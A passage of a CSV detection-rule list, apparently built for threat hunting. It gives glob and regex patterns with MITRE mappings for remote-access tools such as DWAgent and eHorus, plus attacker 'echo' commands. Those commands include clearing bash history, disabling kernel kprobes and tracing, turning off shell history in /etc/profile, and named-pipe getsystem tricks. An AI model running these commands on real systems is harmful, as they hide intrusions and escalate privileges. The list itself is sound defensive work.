public ip address","T1596 - T1590.005","TA0043 - TA0007 - TA0009","Ducktail ","N/A","Reconnaissance","https://www.trendmicro.com/en_be/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*/dwagent.desktop*",".{0,1000}\/dwagent\.desktop.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","N/A","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z" "*/dwagent.service*",".{0,1000}\/dwagent\.service.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","N/A","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z" "*/dwagsystray*",".{0,1000}\/dwagsystray.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","N/A","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z" "*\.dwagent\*",".{0,1000}\\\.dwagent\\.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","N/A","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z" "*\AppData\Local\Temp\dwagent*",".{0,1000}\\AppData\\Local\\Temp\\dwagent.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered 
Spider*","RMM","https://github.com/dwservice/agent","1","0","N/A","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z" "*\CurrentVersion\Run\DWAgentMon*",".{0,1000}\\CurrentVersion\\Run\\DWAgentMon.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","N/A","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z" "*\dwagent.exe*",".{0,1000}\\dwagent\.exe.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","N/A","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z" "*\DWAgent.lnk*",".{0,1000}\\DWAgent\.lnk.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","N/A","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z" "*\dwagent.log*",".{0,1000}\\dwagent\.log.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","N/A","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z" "*\dwagent.pid*",".{0,1000}\\dwagent\.pid.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","N/A","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z" 
"*\dwagent.start*",".{0,1000}\\dwagent\.start.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","N/A","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z" "*\dwagent.stop*",".{0,1000}\\dwagent\.stop.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","N/A","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z" "*\dwaggdi.dll*",".{0,1000}\\dwaggdi\.dll.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","N/A","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z" "*\dwaginstall.log*",".{0,1000}\\dwaginstall\.log.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","N/A","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z" "*\dwaglnc.exe*",".{0,1000}\\dwaglnc\.exe.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","N/A","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z" "*\dwagsvc.exe*",".{0,1000}\\dwagsvc\.exe.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - 
T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","N/A","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z" "*\dwagupd.dll*",".{0,1000}\\dwagupd\.dll.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","N/A","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z" "*\Services\DWAgent*",".{0,1000}\\Services\\DWAgent.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","N/A","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z" "*\Start Menu\Programs\DWAgent*",".{0,1000}\\Start\sMenu\\Programs\\DWAgent.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","N/A","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z" "*>DWAgent<*",".{0,1000}\>DWAgent\<.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","N/A","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z" "*015774ac49fa929ca39c0707aa8177e4605b7df9f53d8630fea1ef5155bb5328*",".{0,1000}015774ac49fa929ca39c0707aa8177e4605b7df9f53d8630fea1ef5155bb5328.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","#filehash","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z" "*1429e62855ce5572b735fe0460ffa6a8f26d56199a8e166152252c7bd659d275*",".{0,1000}1429e62855ce5572b735fe0460ffa6a8f26d56199a8e166152252c7bd659d275.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","#filehash","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z" "*3241d780f32a6a89d3b3f30d85f21f33f9d4d91227d129b2fd81d75baa870337*",".{0,1000}3241d780f32a6a89d3b3f30d85f21f33f9d4d91227d129b2fd81d75baa870337.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","#filehash","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z" "*36a7532a957652a55dbf0b196905652a1f0b8c4019b7ca4e749fa81e5f2c149b*",".{0,1000}36a7532a957652a55dbf0b196905652a1f0b8c4019b7ca4e749fa81e5f2c149b.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","#filehash","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z" "*4f21a1d0e7caa97018e4d0b8c7e63fbc54d081976dfda9409f57a3ead24074a7*",".{0,1000}4f21a1d0e7caa97018e4d0b8c7e63fbc54d081976dfda9409f57a3ead24074a7.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered 
Spider*","RMM","https://github.com/dwservice/agent","1","0","#filehash","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z" "*cd12e8a285c77102487f04726b91bc649f9ad087a1e9a5546124a0cc7480c221*",".{0,1000}cd12e8a285c77102487f04726b91bc649f9ad087a1e9a5546124a0cc7480c221.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","#filehash","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z" "*d2b2455b755476d0b35c721ccdb84432e51812ab646a9210137c1e85b90d7de4*",".{0,1000}d2b2455b755476d0b35c721ccdb84432e51812ab646a9210137c1e85b90d7de4.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","#filehash","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z" "*dwagent_install.log*",".{0,1000}dwagent_install\.log.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","N/A","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z" "*dwagent_unistall.log*",".{0,1000}dwagent_unistall\.log.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","N/A","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z" "*dwaggdi_x86_32.dll*",".{0,1000}dwaggdi_x86_32\.dll.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by 
attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","N/A","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z" "*dwaggdi_x86_64.dll*",".{0,1000}dwaggdi_x86_64\.dll.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotely control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","N/A","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z" "*dwagscreencapture.dll*",".{0,1000}dwagscreencapture\.dll.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotely control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","N/A","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z" "*dwagscreencapturebitblt.dll*",".{0,1000}dwagscreencapturebitblt\.dll.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotely control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","N/A","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z" "*dwagscreencapturedesktopduplication.dll*",".{0,1000}dwagscreencapturedesktopduplication\.dll.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotely control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","N/A","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z" "*dwservice/agent*",".{0,1000}dwservice\/agent.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotely control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","N/A","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z" "*Program Files\DWAgent*",".{0,1000}Program\sFiles\\DWAgent.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotely control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","N/A","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z" "*www.dwservice.net*",".{0,1000}www\.dwservice\.net.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotely control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","1","N/A","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z" "*nabbmpekekjknlbkgpodfndbodhijjem*",".{0,1000}nabbmpekekjknlbkgpodfndbodhijjem.{0,1000}","greyware_tool_keyword","Earth VPN","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*%COMSPEC%*echo*\pipe\*",".{0,1000}\%COMSPEC\%.{0,1000}echo.{0,1000}\\pipe\\.{0,1000}","greyware_tool_keyword","echo","Detects the use of getsystem Meterpreter/Cobalt Strike command. 
Getsystem is used to elevate privilege to SYSTEM account.","T1068.003 - T1078.002","TA0004 - TA0008","N/A","N/A","Exploitation tool","https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_meterpreter_or_cobaltstrike_getsystem_service_start.yml","1","0","N/A","greyware tool - risks of False positive !","N/A","10","8034","2149","2024-08-29T18:41:50Z","2016-12-24T09:48:49Z" "*cmd*echo*\pipe\*",".{0,1000}cmd.{0,1000}echo.{0,1000}\\pipe\\.{0,1000}","greyware_tool_keyword","echo","Detects the use of getsystem Meterpreter/Cobalt Strike command. Getsystem is used to elevate privilege to SYSTEM account","T1068.003 - T1078.002","TA0004 - TA0008","N/A","N/A","Exploitation tool","https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_meterpreter_or_cobaltstrike_getsystem_service_start.yml","1","0","N/A","greyware tool - risks of False positive !","N/A","10","8034","2149","2024-08-29T18:41:50Z","2016-12-24T09:48:49Z" "*cmd.exe /S /D /c* echo 123",".{0,1000}cmd\.exe\s\s\/S\s\/D\s\/c.{0,1000}\secho\s123","greyware_tool_keyword","echo","Adversaries may attempt to test echo command after exploitation","T1059.001 - T1059.003","TA0002 - TA0006","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*cmd.exe /c echo %username%*",".{0,1000}cmd\.exe\s\/c\secho\s\%username\%.{0,1000}","greyware_tool_keyword","echo","alternative to whoami","T1033","TA0007 ","N/A","N/A","Discovery","N/A","1","0","N/A","greyware tool - risks of False positive !","6","9","N/A","N/A","N/A","N/A" "*cmd.exe /c echo * > \\.\pipe\*",".{0,1000}cmd\.exe\s\/c\secho\s.{0,1000}\s\>\s\\\\\.\\pipe\\.{0,1000}","greyware_tool_keyword","echo","potential malleable Cobalt Strike profiles behavior","T1559 - T1134.001","TA0008 - TA0011","N/A","APT19 - APT29 MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group 
- Conti - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","#namedpipe","N/A","10","10","135","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" "*cmd.exe /c echo * > \\.\pipe\*",".{0,1000}cmd\.exe\s\/c\secho\s.{0,1000}\s\>\s\\\\\.\\pipe\\.{0,1000}","greyware_tool_keyword","echo","Named pipe impersonation","T1134.002 - T1055 - T1548.002","TA0004 - TA0003 - TA0002","N/A","N/A","Privilege Escalation","https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*echo '' > ~/.bash_history*",".{0,1000}echo\s\'\'\s\>\s\~\/\.bash_history.{0,1000}","greyware_tool_keyword","echo","delete bash history","T1070.006","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*echo 0 > /sys/kernel/debug/kprobes/enabled*",".{0,1000}echo\s0\s\>\s\/sys\/kernel\/debug\/kprobes\/enabled.{0,1000}","greyware_tool_keyword","echo","This command disables kprobes by writing '0' to the enabled file. 
Kprobes are dynamic breakpoints in the Linux kernel that can be used to intercept functions and gather information for debugging or monitoring.","T1562.001 - T1055 - T1070.004","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*echo 0 > /sys/kernel/debug/tracing/instances/$*/tracing_on*",".{0,1000}echo\s0\s\>\s\/sys\/kernel\/debug\/tracing\/instances\/\$.{0,1000}\/tracing_on.{0,1000}","greyware_tool_keyword","echo","This command turns off tracing for a specific instance","T1562.001 - T1055 - T1070.004","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*echo 'set +o history' >> /etc/profile*",".{0,1000}echo\s\'set\s\+o\shistory\'\s\>\>\s\/etc\/profile.{0,1000}","greyware_tool_keyword","echo","linux command abused by attacker","T1146 - T1059.004 - T1556.003","TA0005 - TA0009 - TA0003","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*""appName"":""eHorus Agent""*",".{0,1000}\""appName\""\:\""eHorus\sAgent\"".{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","#registry","N/A","10","10","N/A","N/A","N/A","N/A" "*$EHORUS_HOME/.vnc/passwd*",".{0,1000}\$EHORUS_HOME\/\.vnc\/passwd.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. 
(server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/ehorus_agent_installer-*",".{0,1000}\/ehorus_agent_installer\-.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/etc/ehorus/ehorus_agent*",".{0,1000}\/etc\/ehorus\/ehorus_agent.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/etc/init.d/ehorus_agent_daemon*",".{0,1000}\/etc\/init\.d\/ehorus_agent_daemon.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. 
(server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/usr/bin/ehorus_agent*",".{0,1000}\/usr\/bin\/ehorus_agent.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/usr/sbin/userdel -r ehorus*",".{0,1000}\/usr\/sbin\/userdel\s\-r\sehorus.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/usr/share/ehorus*",".{0,1000}\/usr\/share\/ehorus.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. 
(server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/var/log/ehorus_agent.log*",".{0,1000}\/var\/log\/ehorus_agent\.log.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","#logfile","N/A","10","10","N/A","N/A","N/A","N/A" "*\eHorus Agent Menu.lnk*",".{0,1000}\\eHorus\sAgent\sMenu\.lnk.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\eHorus Agent.lnk*",".{0,1000}\\eHorus\sAgent\.lnk.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. 
(server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\ehorus standalone.exe*",".{0,1000}\\ehorus\sstandalone\.exe.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\ehorus_agent.conf*",".{0,1000}\\ehorus_agent\.conf.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\ehorus_agent.exe*",".{0,1000}\\ehorus_agent\.exe.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. 
(server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\ehorus_agent.log*",".{0,1000}\\ehorus_agent\.log.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","#logfile","N/A","10","10","N/A","N/A","N/A","N/A" "*\ehorus_agent_disconn.log*",".{0,1000}\\ehorus_agent_disconn\.log.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","#logfile","N/A","10","10","N/A","N/A","N/A","N/A" "*\ehorus_cmd.exe*",".{0,1000}\\ehorus_cmd\.exe.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. 
(server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\ehorus_display.exe*",".{0,1000}\\ehorus_display\.exe.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\ehorus_installer_windows-*",".{0,1000}\\ehorus_installer_windows\-.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on 